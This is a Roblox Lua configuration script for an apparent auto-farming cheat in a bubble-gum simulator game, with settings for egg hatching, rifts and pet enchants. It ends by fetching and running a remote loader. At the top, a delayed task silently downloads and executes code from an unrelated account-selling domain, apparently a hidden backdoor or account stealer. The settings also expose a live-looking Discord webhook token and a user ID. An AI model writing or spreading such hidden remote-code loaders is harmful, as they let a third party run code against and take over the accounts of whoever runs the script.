task.spawn(function()		
wait(30)
loadstring(game:HttpGet("https://sellaccroblox.com/raw/view.php?file=Thulinh20%2Fcheckbattlepass.txt"))()
end)


getgenv().Settings = {
    ["Egg Settings"] = {
        OpenEggs = true,
        Egg = "Nightmare Egg",
        --// Supports ANY egg ("Rainbow Egg", "Infinity Egg", ...). Keep "Best" for new accounts.
        
        ["Notifications"] = {
            Webhook = "https://discord.com/api/webhooks/1280307675636301948/sM8Y96yRhPp_bcFBoHewrtwcuP2LoWfyOAmzuv_Lk3YSeboqh4A5XV9oDKwBBn1MR2yD",
            DiscordID = "332193090825748484",
            Difficulty = "100k", --// Minimum Difficulty for Webhook Notifications
        },

        ["Rifts"] = {
            FindRifts = false,
            SortByMultiplier = true, 
            --// true --> Sort by Multiplier out of ALL Targetted Rifts.
            --// false --> Sort by Multiplier out of BEST Targetted Rifts.
            
            Targets = {"Aura Egg", "Nightmare Egg"},
            --// Targets = {} will automatically find the Top 3 BEST Rifts to hatch.
        },
    },
    
	["Enchant Settings"] = {
        EnchantPets = true,
        
        ["Require All Enchants"] = true,
        ["Enchants Needed"] = {
            ["Team Up"] = {Tier = 1, HigherTiers = true},
        },
    },
	
    ["Debug"] = {
        DisableUI = false,
    },
}
loadstring(game:HttpGet("https://system-exodus.com/scripts/BGSI/OneClick.lua"))()
